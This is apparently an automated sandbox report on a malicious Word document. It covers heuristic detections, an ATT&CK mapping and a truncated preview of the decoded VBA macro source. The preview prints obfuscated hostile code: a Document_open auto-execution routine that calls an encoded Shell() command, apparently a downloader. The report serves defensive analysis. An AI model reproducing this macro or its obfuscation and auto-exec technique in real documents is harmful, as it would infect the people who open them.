Verdict: MALICIOUS (Risk Score 162)
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample contains VBA macros, including a Document_Open auto-execution macro that calls Shell(). This indicates an attempt to execute arbitrary code as soon as the document is opened, most likely to download and run a second-stage payload. The VBA is heavily obfuscated: almost every procedure is padded with meaningless arithmetic over Rnd(), Chr() and ChrB(), the strings passed to the decoding helper are built with (string, start, length) arguments whose numbers are hidden behind expressions such as `AzbIi - AzbIi + 3 + AzbIi - AzbIi`, and `On Error Resume Next` in Document_open and the decoder ensures that any run-time error raised by the junk expressions does not stop the macro. This obfuscation prevents static recovery of the exact command or payload.
Heuristics (5)
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that any Office document containing drawing content carries; it is not a host the macro contacts and should not be treated as an indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34824 bytes | 2ebefddc1ec81af3348e97f6106617da6a73af94064ab4dfe41137cf82bb1f50 |
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "iIhbMGSuKA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub tBMVq(jSCVIz)
XUdbKM = 88208 * ZNEEwM + 37002 * ChrB(87053 * Rnd(72387) - 769 + vGddwM) - 71946 - Rnd(ZzrpsM) + 32338 - ETGFsq * 57299 * Chr(oIQtR)
End Sub
Sub ZRVdD(urhPYi)
siYMs = 61730 * OZfum + 8887 * ChrB(56060 * Rnd(17169) - 77814 + vsQMaa) - 38242 - Rnd(IbwNm) + 82338 - NWlmQv * 45622 * Chr(wwzma)
zMlCtT = 63015 * HRIEw + 69845 * ChrB(9457 * Rnd(48118) - 2290 + oNYhrW) - 46360 - Rnd(YiUObo) + 87210 - JOKKt * 44080 * Chr(zPUdM)
nIXzLz = 24647 * RUOiB + 91970 * ChrB(3566 * Rnd(87462) - 87201 + UKbbqO) - 81161 - Rnd(RNYSXs) + 23206 - kWzQPq * 62569 * Chr(rtvjs)
End Sub
Sub wGVdJB(MSIHR)
zuwzWS = 11546 * fwcad + 58528 * ChrB(46354 * Rnd(67575) - 93097 + JCqPS) - 94057 - Rnd(jKZYEo) + 19060 - KhJtwZ * 27273 * Chr(PTKtCj)
zdVpz = 30149 * jcBDnH + 62358 * ChrB(74565 * Rnd(51277) - 15298 + dTzOp) - 99925 - Rnd(vQawID) + 82321 - ocviw * 24097 * Chr(Uzhrsm)
End Sub
Private Sub Document_open()
On Error Resume Next
FdsCa = 49372 * ZinVw + 3672 * ChrB(99328 * Rnd(30041) - 76276 + wMkTE) - 83728 - Rnd(JFvzzh) + 95599 - GoKzD * 11711 * Chr(RqOtHN)
AsXQJUXjIkbz (KiEJN + CiBZsEbvdCSIDf + jCnBlA)
UiNZAp = 28077 * NpSjNV + 91640 * ChrB(88867 * Rnd(8069) - 20235 + iHvNup) - 39370 - Rnd(bEAIL) + 6210 - Hmcps * 34487 * Chr(MzsmZz)
End Sub
Sub kIjqB(lZRSj)
lnkMjG = 62663 * NIRPR + 34388 * ChrB(61519 * Rnd(89057) - 96068 + IQVfq) - 93389 - Rnd(RJhbh) + 41672 - FMjLb * 71263 * Chr(ftwKb)
UZjqrb = 94242 * TLGwo + 90412 * ChrB(27707 * Rnd(94399) - 98855 + jnHJF) - 72826 - Rnd(SMHdW) + 42773 - PFwsZ * 82926 * Chr(GYAlBZ)
nqwit = 50105 * ojKUwV + 48106 * ChrB(28414 * Rnd(79659) - 61347 + plhiwV) - 44749 - Rnd(oZOGY) + 7695 - GiWJv * 55374 * Chr(raWmYb)
End Sub
Sub LrjUo(ojFrc)
llEZd = 73324 * lOurj + 70050 * ChrB(38869 * Rnd(86238) - 88512 + LLzvm) - 55922 - Rnd(fljrXa) + 48247 - jkrKmA * 87216 * Chr(IpHQz)
End Sub
Sub kUTuY(jfPzIW)
rCYOnV = 24954 * zdiHGS + 22164 * ChrB(77774 * Rnd(10863) - 58621 + icAPY) - 55654 - Rnd(fwBVr) + 3913 - FBzkb * 38914 * Chr(mEkrln)
bUrJU = 93020 * Sqmzll + 80768 * ChrB(27289 * Rnd(95417) - 58838 + jrAQNE) - 57901 - Rnd(QwXQY) + 75856 - jEiKLW * 10893 * Chr(nKLkqi)
End Sub
Attribute VB_Name = "YGGFEvR"
Sub HmfKf(uaOMvB)
knTOaO = 26343 * CTnbL + 45510 * ChrB(33406 * Rnd(19385) - 35465 + tStXXf) - 23449 - Rnd(lsjzY) + 89589 - ToTnri * 64311 * Chr(EETri)
End Sub
Function CiBZsEbvdCSIDf()
On Error Resume Next
SqduV = 89205 * zfKVX + 50020 * ChrB(81220 * Rnd(55349) - 64907 + JpHKrn) - 95301 - Rnd(iRnpiz) + 5964 - zvuzQ * 80360 * Chr(HXYiK)
aFTnA = qUlzZX("nZ'DHbJ+HbJleTd7(5WHbJ+HbJaasfcHbJ+HbJ'+'.HbJ+HbJTd'+'7ToStrHbJ+HbJmWDHbJ+HbJimWDNHbJ+HbJgTdHbJ+Hb'+'J7(),HbJ+HbJ 5WaSDC);HbJ+HbpQoz%i", AzbIi - AzbIi + 3 + AzbIi - AzbIi, AzbIi - AzbIi + 126 + AzbIi - AzbIi)
KliEO = 1464 * azaDj + 8697 * ChrB(75662 * Rnd(55665) - 57658 + AKSUa) - 89453 - Rnd(jiUZAn) + 37014 - noYjF * 71116 * Chr(zmcAU)
omMzta = 58078 * RjIUkR + 59217 * ChrB(46009 * Rnd(92803) - 29130 + DrzzBb) - 53598 - Rnd(NillmS) + 52756 - XFLIj * 70635 * Chr(mHDzM)
GmNFtHYhYjk = qUlzZX("SuYOYvHbJ'+'ch(5WHbJ+HbJaaHbJ+HbJsfc 'ocq", RMCmdP - RMCmdP + 7 + RMCmdP - RMCmdP, RMCmdP - RMCmdP + 32 + RMCmdP - RMCmdP)
vjXrZp = 86011 * mKWRlR + 29069 * ChrB(60480 * Rnd(90055) - 40714 + IQHSk) - 13706 - Rnd(SkNszi) + 29017 - RwOuNd * 66745 * Chr(kupqz)
SzUhqw = 56592 * fSQSoM + 63126 * ChrB(7154 * Rnd(23772) - 77523 + rpiMOZ) - 68241 - Rnd(vtzrCW) + 94671 - fzjCs * 80152 * Chr(svFwK)
KVkQWENmzMB = qUlzZX("CIOztHbJ+HbJ;5WHbJ+HbJaNSB = 5WansauSRrI", rGMiv - rGMiv + 5 + rGMiv - rGMiv, rGMiv - rGMiv + 31 + rGMiv - rGMiv)
KMJuBw = 77585 * mGHGKh + 81933 * ChrB(64781 * Rnd(51778) - 27066 + qHBDcl) - 88061 - Rnd(jqQJd) + 48873 - khnwAX * 17092 * Chr(stbvi)
LmMDbv = 66490 * OFpAV + 754 * ChrB(52877 * Rnd(51851) - 51095 + vXVNw) - 38000 - Rnd(nzpUdz) + 1473
... (truncated)